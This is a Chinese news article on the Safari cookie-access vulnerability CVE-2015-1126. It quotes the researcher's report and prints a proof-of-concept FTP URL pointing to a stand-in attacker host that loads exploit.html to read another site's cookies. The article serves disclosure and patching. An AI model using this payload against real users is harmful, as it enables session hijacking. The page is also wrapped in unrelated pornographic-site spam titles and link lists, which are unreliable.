成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Safari瀏覽器cookie訪問(wèn)漏洞影響數(shù)十億蘋(píng)果產(chǎn)品

安全 漏洞
存在于Safari瀏覽器中的一個(gè)cookie訪問(wèn)漏洞(CVE-2015-1126)可能會(huì)影響數(shù)十億蘋(píng)果產(chǎn)品,如果你在使用Safari瀏覽器,一定要盡快檢測(cè)它是否受該漏洞影響,若受影響請(qǐng)盡快修復(fù)。

存在于Safari瀏覽器中的一個(gè)cookie訪問(wèn)漏洞(CVE-2015-1126)可能會(huì)影響數(shù)十億蘋(píng)果產(chǎn)品,如果你在使用Safari瀏覽器,一定要盡快檢測(cè)它是否受該漏洞影響,若受影響請(qǐng)盡快修復(fù)。

[[132215]]

科普:cookie

Cookie,有時(shí)也用其復(fù)數(shù)形式Cookies,指某些網(wǎng)站為了辨別用戶(hù)身份、進(jìn)行session跟蹤而儲(chǔ)存在用戶(hù)本地終端上的數(shù)據(jù)(通常經(jīng)過(guò)加密)。Cookie可以保持登錄信息到用戶(hù)下次與服務(wù)器的會(huì)話,即下次訪問(wèn)同一網(wǎng)站時(shí),用戶(hù)不必再次輸入用戶(hù)名和密碼就可以登錄。

Cookies最典型的應(yīng)用是判定注冊(cè)用戶(hù)是否已經(jīng)登錄網(wǎng)站,用戶(hù)可能會(huì)得到提示,是否在下一次進(jìn)入此網(wǎng)站時(shí)保留用戶(hù)信息以便簡(jiǎn)化登錄手續(xù),這些都是Cookies的功用。另一個(gè)重要應(yīng)用場(chǎng)合是“購(gòu)物車(chē)”之類(lèi)處理,用戶(hù)可能會(huì)在一段時(shí)間內(nèi)在同一家網(wǎng)站的不同頁(yè)面中選擇不同的商品,這些信息都會(huì)寫(xiě)入Cookies,以便在最后付款時(shí)提取信息。

漏洞詳情

前段時(shí)間,芬蘭一家公司Klikki Oy的安全研究員Jouko Pynnönen發(fā)現(xiàn)了Safari瀏覽器中存在安全漏洞(CVE-2015-1126),該漏洞可能會(huì)影響數(shù)十億蘋(píng)果產(chǎn)品。該跨域漏洞會(huì)影響Safari的URL文件傳輸機(jī)制,攻擊者可以精心制作一個(gè)web網(wǎng)頁(yè),當(dāng)受害者訪問(wèn)該頁(yè)面時(shí),就可以繞過(guò)一些正常的跨域限制,然后訪問(wèn)或操作任何網(wǎng)站的HTTP cookies。

Pynnönen在一份安全報(bào)告中寫(xiě)道:

 “攻擊者可以精心編制一個(gè)web頁(yè)面,當(dāng)目標(biāo)網(wǎng)民訪問(wèn)該頁(yè)面時(shí),攻擊者就可以繞過(guò)一些正常的跨域限制從而訪問(wèn)或操作任何網(wǎng)站的HTTP cookies。大多數(shù)允許用戶(hù)登錄的網(wǎng)站都會(huì)在cookies中存儲(chǔ)它們的認(rèn)證信息(通常是會(huì)話ID等信息),攻擊者訪問(wèn)這些cookies就可以劫持認(rèn)證會(huì)話。在iOS、OS X和Windows系統(tǒng)上所有Safari的測(cè)試版本都受該漏洞影響,產(chǎn)品總量可能達(dá)到十億數(shù)量級(jí)。”

研究人員解釋道,iOS 8.1、6.1.6及OS X 10.9.3和Windows8.1系統(tǒng)上的7.0.4和5.1.7版本的Safari瀏覽器都受到該漏洞的影響。

Safari瀏覽器cookie訪問(wèn)漏洞影響數(shù)十億蘋(píng)果產(chǎn)品

漏洞PoC URL

目前針對(duì)此漏洞,在URL中的用戶(hù)名或密碼字段編碼特殊字符就可能引發(fā)安全問(wèn)題,示例鏈接如下所示。

ftp://user:password@host/path

當(dāng)用戶(hù)名或密碼字段中包含編碼的特殊字符時(shí),通過(guò)操作該URL,攻擊者可以下載目標(biāo)網(wǎng)站的文檔資料。Pynnönen還提供了下面的示例PoC URL:

ftp://user%40attacker.com%2Fexploit.html%23@apple.com/

當(dāng)受害者訪問(wèn)該URL時(shí),存在此漏洞的Safari瀏覽器會(huì)加載攻擊者所控制網(wǎng)站attacker.com上的exploit.html文件,之后攻擊者便會(huì)利用JavaScript訪問(wèn)和操作apple.com網(wǎng)站的cookies。受影響的瀏覽器會(huì)將上面URL解碼成如下形式:

ftp://user@attacker.com/exploit.html#apple.com/

即在一個(gè)正常的web頁(yè)面中嵌入指向一個(gè)FTP URL的IFRAME,這樣就可以發(fā)起攻擊了。

漏洞已修復(fù)

該漏洞已經(jīng)被蘋(píng)果公司修復(fù),使用Safari瀏覽器的用戶(hù)可以使用Safari cookie漏洞檢測(cè)工具來(lái)檢測(cè)其瀏覽器是否受影響,若受影響一定要盡快修復(fù)它。

責(zé)任編輯:藍(lán)雨淚 來(lái)源: FreeBuf
相關(guān)推薦

2021-12-17 11:29:03

WiFi漏洞芯片

2020-08-11 23:28:30

漏洞瀏覽器網(wǎng)絡(luò)安全

2021-09-07 05:36:59

藍(lán)牙漏洞惡意代碼

2012-01-04 13:08:30

2022-01-21 13:37:01

蘋(píng)果MacSafari 瀏覽器

2021-09-08 05:36:46

藍(lán)牙BrakTooth漏洞

2022-01-19 11:50:05

iPadOS 15Safari瀏覽器

2022-01-21 06:54:18

iPhoneiPadiOS

2009-11-16 09:33:57

2009-10-19 23:25:04

2011-04-14 10:31:45

Safari瀏覽器

2012-06-18 14:06:01

MozillaiPad瀏覽器

2016-01-08 16:26:10

蘋(píng)果瀏覽器Safari

2016-12-14 09:54:56

Safari瀏覽器蘋(píng)果

2020-09-17 11:02:40

BLESA藍(lán)牙攻擊漏洞

2012-03-19 17:07:31

Safari

2015-05-20 17:24:37

2009-12-16 09:55:07

Google蘋(píng)果Chrome

2022-01-27 07:00:12

iPhoneiPadiOS

2022-01-27 23:29:21

iOS蘋(píng)果漏洞
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 欧美亚洲第一区 | 亚洲在线高清 | 亚洲午夜久久久 | 99资源| 涩涩导航 | 亚洲第一成年免费网站 | 亚洲精品视频免费观看 | 免费在线观看成人 | 麻豆亚洲| 国产色黄 | 国产精品呻吟久久av凹凸 | 国产精品自产拍在线观看蜜 | 夜夜爆操| 欧美最猛性xxxxx亚洲精品 | 国产一区二区影院 | 久久精品国产久精国产 | 国产98色在线 | 日韩 | 国产欧美一区二区三区国产幕精品 | 国产精品一区在线观看你懂的 | 欧美激情va永久在线播放 | 一区二区三区高清不卡 | 精品欧美色视频网站在线观看 | 国产精品欧美一区二区三区 | 黄网站免费在线观看 | 亚洲网站免费看 | 精品日本中文字幕 | 欧美精品成人一区二区三区四区 | 一区二区三区国产视频 | 日本成人在线免费视频 | 欧美高清一区 | 国产亚洲欧美另类一区二区三区 | 国产在线观看网站 | 久久久www成人免费精品 | 久久久久九九九九 | 亚洲高清在线 | 极品电影院 | 亚洲免费在线 | 99视频在线播放 | 涩涩99| 国产精品成人一区二区三区夜夜夜 | 午夜在线免费观看视频 |